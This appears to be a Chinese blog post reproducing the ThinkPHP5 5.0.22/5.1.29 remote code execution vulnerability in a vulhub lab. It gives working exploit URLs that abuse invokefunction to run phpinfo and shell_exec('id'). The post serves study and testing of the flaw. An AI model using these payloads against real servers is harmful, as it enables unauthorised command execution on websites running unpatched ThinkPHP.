title: 漏洞复现-ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
tags: 漏洞复现
abbrlink: 6d7b1ec8
date: 2023-02-07 08:46:22

环境: vulhub

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

参考链接:

漏洞环境

运行ThinkPHP 5.0.20版本:

环境启动

image-20230207085237477

网页

image-20230207085331460

复现

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

即可执行phpinfo:

image-20230207085523912

  • 漏洞成功利用
http://192.168.169.233:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id

image-20230207085735263

image-20230207090027833

工具

image-20230207090417222